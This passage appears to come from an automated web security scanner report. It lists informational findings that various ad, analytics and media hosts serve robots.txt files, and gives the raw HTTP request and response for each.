HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:33 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=7;expires=Wed, 22-Jun-2016 20:43:33 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.21. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 19 Jul 2011 20:43:12 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

26.22. http://cache.boston.com/universal/js/twitterwidget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.boston.com
Path:	/universal/js/twitterwidget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:18:03 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Tue, 14 Nov 2006 18:37:39 GMT
ETag: "800493-14d-42239502409df"
Accept-Ranges: bytes
Served-By: rebecca
Age: 1546
Cache-Control: max-age=2349
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 20:57:13 GMT
Content-Type: text/plain
Via: 1.0 rhv082185010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 333
Connection: close

# this is a "configuration" file for web robots, so that we can
# make sure that these crawlers/robots/indexers do not follow links
# on our site to things like cgi scripts, which could cause some
# u
...[SNIP]...

26.23. http://cache.specificmedia.com/creative/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/creative/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: rf-ht jfk-agg-n63 ( lax-agg-n46), ht lax-agg-n5.panthercdn.com
ETag: "ffdde9-1a-44ed7e3e1bdc0"
Cache-Control: max-age=604800
Expires: Tue, 26 Jul 2011 20:44:21 GMT
Age: 0
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 04 Jun 2008 14:17:35 GMT
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.stumble-upon.com/css/global_su.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/css/global_su.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: text/plain; charset=iso-8859-1
Date: Tue, 19 Jul 2011 14:28:26 GMT
Content-Length: 1962
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

26.25. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Tue, 19 Jul 2011 20:43:09 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.26. http://cgi.ebay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cgi.ebay.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cgi.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 1272
Date: Tue, 19 Jul 2011 18:36:24 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.27. http://cheetah.vizu.com/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/a.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:23 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n29 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
ETag: "3c053-1a-8dc02bc0"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 09:26:10 GMT
Age: 213493
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 14 Jul 2011 23:04:23 GMT
Connection: close

User-agent: *
Disallow: /

26.28. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. http://creatives.as4x.tmcs.net/tmsandbox3a.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creatives.as4x.tmcs.net
Path:	/tmsandbox3a.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creatives.as4x.tmcs.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Aug 2003 22:04:31 GMT
ETag: "22ffd3-87-3c4e1b86d79c0"
Accept-Ranges: bytes
Content-Length: 135
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Type: text/plain
Date: Tue, 19 Jul 2011 18:36:27 GMT
Connection: close

User-agent: *
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /js.ng/
Disallow: /click.ng/
Disallow: /image.ng/
Disallow: /ping.ng/

26.30. http://digg.com/ajax/tooltip/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/tooltip/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
Last-Modified: Mon, 11 Jul 2011 21:43:10 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=267 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9995
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.31. http://farecastcom.122.2o7.net/b/ss/farecastcom/1/H.15.1/s76965045684482 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://farecastcom.122.2o7.net
Path:	/b/ss/farecastcom/1/H.15.1/s76965045684482

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farecastcom.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:00:29 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "e9e04-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www83
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.32. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3573
Expires: Tue, 19 Jul 2011 15:24:44 GMT
Date: Tue, 19 Jul 2011 14:25:11 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

26.33. http://fonts.googleapis.com/css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fonts.googleapis.com
Path:	/css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:20:38 GMT
Expires: Tue, 19 Jul 2011 14:20:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.34. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:38 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.35. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052447870/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1052447870/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 12:24:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.36. http://ibegin.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ibegin.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ibegin.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Jul 2011 00:00:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 08 Oct 2010 14:12:24 GMT
ETag: "1400db-166-4921b99814200"
Accept-Ranges: bytes
Content-Length: 358
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /about/
Disallow: /blog/
Disallow: /weather/share
Disallow: /weather/xml
Disallow: /weather/removelocation.php
Disallow: /weather/setlocation.php
Disallow:
...[SNIP]...

26.37. http://in.getclicky.com/in.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://in.getclicky.com
Path:	/in.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:25 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 23:34:26 GMT
ETag: "5e403d-1f-4a7fbdb606480"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats/

26.38. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 19 Jul 2011 14:21:55 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

26.39. http://metrics.boston.com/b/ss/nytbglobe/1/H.20.3/s81497499125071 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.boston.com
Path:	/b/ss/nytbglobe/1/H.20.3/s81497499125071

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:15 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "1e9153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www44
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.40. http://metrics.ticketmaster.com/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.ticketmaster.com
Path:	/b/ss/tm-usprod,tm-combinedusprod/1/H.22.1/s82794165948871

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "8c701-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www81
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.41. http://metrics.versionone.com/b/ss/vonenewprod/1/H.17/s66275241293478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.versionone.com
Path:	/b/ss/vonenewprod/1/H.17/s66275241293478

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:37 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2f4193-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www426
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=77551296
Expires: Thu, 02 Jan 2014 04:26:46 GMT
Date: Tue, 19 Jul 2011 14:25:10 GMT
Connection: close

User-agent: *
Disallow: /

26.43. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Fri, 24 Jun 2011 17:54:48 GMT
Accept-Ranges: bytes
ETag: "024edce9732cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:42 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

26.44. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"28-1306767303000"
Last-Modified: Mon, 30 May 2011 14:55:03 GMT
Content-Type: text/plain
Content-Length: 28
Date: Tue, 19 Jul 2011 20:44:13 GMT
Connection: close

User-agent: *
Disallow: /

26.45. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.46. http://pixel.quantserve.com/seg/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 20 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: QS

User-agent: *
Disallow: /

26.47. http://profile.live.com/badge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/badge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Imf: f10a374d-3fda-4e40-9f79-c5561402fdf4
Set-Cookie: E=P:OfkUiDcUzog=:m3+o48khan8jv/61bPUUITy9k/QX5NvjkSrO8V/7so4=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: sc_clustbl_142=73dc7597b22d9205; domain=profile.live.com; expires=Thu, 18-Aug-2011 14:30:24 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC668 V: 1 D: 7/13/2011
Date: Tue, 19 Jul 2011 14:30:23 GMT
Connection: close
Content-Length: 44

...User-agent: *
Disallow: /applications/

26.48. http://puma.vizu.com/cdn/00/00/21/04/smart_tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/cdn/00/00/21/04/smart_tag.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n5 ( iad-agg-n6), ht-d iad-agg-n6.panthercdn.com
ETag: "9c6e3-1a-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Mon, 25 Jul 2011 13:05:17 GMT
Age: 113944
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

User-agent: *
Disallow: /

26.49. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:05 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

26.50. http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rmedia.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: Apache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
ETag: "4000aa-60-5dbf7640"
Accept-Ranges: bytes
Content-Length: 96
Keep-Alive: timeout=300, max=105
Connection: close
Content-Type: text/plain

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/

26.51. http://rover.ebay.com/rover/1/711-53200-19255-0/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rover.ebay.com
Path:	/rover/1/711-53200-19255-0/1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rover.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 810
Date: Tue, 19 Jul 2011 18:35:47 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.52. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rt.legolas-media.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 17:04:21 GMT
ETag: "1ad0152-1b-49f79d177ef40"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.53. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing-cache.google.com
Path:	/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY7LQDIPC0AyoFcNoAAAEyBWzaAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Fri, 10 Jun 2011 20:18:24 GMT
Date: Tue, 19 Jul 2011 14:28:16 GMT
Expires: Tue, 19 Jul 2011 14:28:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.54. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

26.55. http://segment-pixel.invitemedia.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:35 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

26.56. http://srx.main.ebayrtm.com/rtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srx.main.ebayrtm.com
Path:	/rtm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: srx.main.ebayrtm.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 810
Date: Tue, 19 Jul 2011 18:36:21 GMT
Connection: keep-alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

26.57. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Date: Tue, 19 Jul 2011 18:37:21 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.58. http://stubhub-www.baynote.net/baynote/tags3/common previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stubhub-www.baynote.net
Path:	/baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stubhub-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1253825728000"
Last-Modified: Thu, 24 Sep 2009 20:55:28 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 19 Jul 2011 18:36:25 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

26.59. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stubhub.tt.omtrdc.net
Path:	/m2/stubhub/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stubhub.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1309299047000"
Accept-Ranges: bytes
Content-Length: 25
Date: Tue, 19 Jul 2011 18:36:23 GMT
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

26.60. http://tag.admeld.com/ad/js/610/bostonglobe/728x90/bg_1064637_61606218 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/js/610/bostonglobe/728x90/bg_1064637_61606218

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Mon, 18 Jul 2011 20:35:07 GMT
ETag: "db6026f-1a-4a85def4bf4c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 19 Jul 2011 20:42:43 GMT
Connection: close

User-agent: *
Disallow: /

26.61. http://themes.googleusercontent.com/font previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://themes.googleusercontent.com
Path:	/font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 19 Jul 2011 14:20:42 GMT
Expires: Tue, 19 Jul 2011 14:20:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.62. http://umfcluj.ro/js/jquery.validate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/js/jquery.validate.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: umfcluj.ro

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 May 2009 08:13:16 GMT
Accept-Ranges: bytes
ETag: "036d67e90d7c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
